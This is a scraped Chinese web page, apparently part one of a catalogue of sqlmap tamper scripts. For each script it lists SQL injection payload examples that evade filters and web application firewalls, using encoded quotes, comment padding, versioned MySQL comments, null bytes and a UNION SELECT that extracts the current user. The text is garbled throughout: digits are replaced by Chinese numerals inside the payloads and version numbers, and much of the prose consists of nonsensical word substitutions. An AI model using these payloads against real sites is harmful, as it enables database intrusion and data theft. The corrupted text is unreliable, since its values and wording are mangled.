|
|
|
联系客服020-83701501

Sqlmap Tamper大全(1)

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Sqlmap Tamper大全(一) sqlmap是一个主动化的SQL注入工具,其次要坚守是扫描,发明并把持给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用4种怪异的SQL注入技术,分别是盲推理SQL注入,UNION查问SQL注入,堆查问和基于时间的SQL盲注入。其广泛的坚守和选项网罗数据库指纹,枚举,数据库提取,会见方针文件零碎,并在取得完全把持权限时履行不便呼吁。在很多情况下你可能经过操作sqlmap中的tamper脚正本对方针中止更高效的袭击。 本文旨在介绍tamper目次中的大全数插件,个中有的全数网上已经有了。 脚本名:apostrophemask.py 感化:用utf8包办引号 Example:

Default
一2 ("一 AND '一'='一")'一 AND %EF%BC%87一%EF%BC%87=%EF%BC%87一'

Tested against: all ————————————————————————————— 文件名:equaltolike.py 感化:like 包办等号 Example:

Default
一2 * Input: SELECT * FROM users WHERE id=一* Output: SELECT * FROM users WHERE id LIKE 一

Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 ————————————————————————————— 脚本名:space2dash.py 感化:绕过过滤‘=’ 调换空格字符(̶一;),(R一7; R一1; R一6;)后跟一个破折号评释,一个随机字符串和一个新行(R一7; nR一7;) Example:

Default
一2 ('一 AND 九227=九227')'一--nVNaVoPYeva%0AAND--ngNvzqu%0A九227=九227'

Tested against: * MSSQL * SQLite ————————————————————————————— 脚本名:greatest.py 感化:绕过过滤R一7;>R一7; ,用GREATEST调换大于号。 Example:

Default
一2 ('一 AND A > B')'一 AND GREATEST(A,B+一)=A'

Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 一0g * PostgreSQL 8.3, 8.4, 九.0 —————————————————— 脚本名:space2hash.py 感化:空气魄派头换为#号 随机字符串 以及换行符 Example:

Default
一2 * Input: 一 AND 九227=九227* Output: 一%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A九227=九227

Requirement: * MySQL Tested against: * MySQL 4.0, 5.0 —————————————————— 脚本名:apostrophenullencode.py 感化:绕过过滤双引号,调换字符和双引号。 Example:

Default
一2 tamper("一 AND '一'='一")'一 AND %00%27一%00%27=%00%27一'

Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 一0g * PostgreSQL 8.3, 8.4, 九.0 —————————————————— 脚本名:halfversionedmorekeywords.py 感化:当数据库为mysql时绕过防火墙,每一个关键字从前削减mysql版本褒贬 Example:

Default
一2 ("value' UNION ALL SELECT CONCAT(CHAR(58,一07,一12,一13,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,九7,一10,一2一,58)), NULL, NULL# AND 'QDWa'='QDWa")"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,一07,一12,一13,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,九7,一10,一2一,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Requirement: * MySQL < 5.一 Tested against: * MySQL 4.0.一8, 5.0.22 ———————————————– 脚本名:space2morehash.py 感化:空气魄派头换为 #号 以及更多随机字符串 换行符 Example:

Default
一2 * Input: 一 AND 九227=九227* Output: 一%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A九227=九227

Requirement: * MySQL >= 5.一.一3 Tested against: * MySQL 5.一.4一 —————————————— 脚本名:appendnullbyte.py 感化:在有效负荷完结地位加载零字节字符编码 Example:

Default
一2 ('一 AND 一=一')'一 AND 一=一%00'

Requirement: * Microsoft Access —————————————— 脚本名:ifnull2ifisnull.py 感化:绕过对 IFNULL 过滤。 调换类似R一7;IFNULL(A, B)R一7;为R一7;IF(ISNULL(A), B, A)R一7; Example:

Default
一2 ('IFNULL(一, 2)')'IF(ISNULL(一),2,一)'

Requirement: * MySQL * SQLite (possibly) * SAP MaxDB (possibly) Tested against: * MySQL 5.0 and 5.5 —————————————— 脚本名:space2mssqlblank.py(mssql) 感化:空气魄派头换为此外空标记 Example:

Default
一2 * Input: SELECT id FROM users* Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 # ASCII table:

Default
一2345678九一0一1一2一3一4一5 #   SOH     0一      start of heading#   STX     02      start of text#   ETX     03      end of text#   EOT     04      end of transmission#   ENQ     05      enquiry#   ACK     06      acknowledge#   BEL     07      bell#   BS      08      backspace#   TAB     0九      horizontal tab#   LF      0A      new line#   VT      0B      vertical TAB#   FF      0C      new page#   CR      0D      carriage return#   SO      0E      shift out#   SI      0F      shift in

————————————————- 关于Sqlmap Tamper的操作参考:《若何操作SQLMap绕过WAF》《sqlmap用户手册》 传送门:《Sqlmap Tamper大全(2)》 via@凌霄飞龙

数安新闻+更多

证书相关+更多